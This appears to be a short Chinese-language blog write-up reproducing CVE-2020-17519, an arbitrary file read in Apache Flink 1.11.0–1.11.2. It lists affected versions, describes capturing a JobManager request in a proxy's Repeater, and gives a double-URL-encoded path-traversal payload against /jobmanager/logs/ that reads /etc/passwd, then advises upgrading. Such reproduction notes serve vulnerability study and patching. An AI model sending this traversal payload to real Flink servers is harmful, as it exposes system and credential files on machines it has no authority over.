漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

一、漏洞概述:

CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

二、影响版本:

Apache Flink : 1.11.0-1.11.2

三、环境搭建:

延用CVE-2020-17518的环境(Apache Flink 1.11.2)

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

 

四、漏洞复现:

  1. 抓取Job Manager的请求包

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

  2.扔到Repeater模块,修改请求包,查看敏感信息

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

 

漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)

五、漏洞修复:

官方已发布安全版本,请及时下载升级至安全版本!

 

上一篇:Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)复现


下一篇:微软Exchange多个高危漏洞通告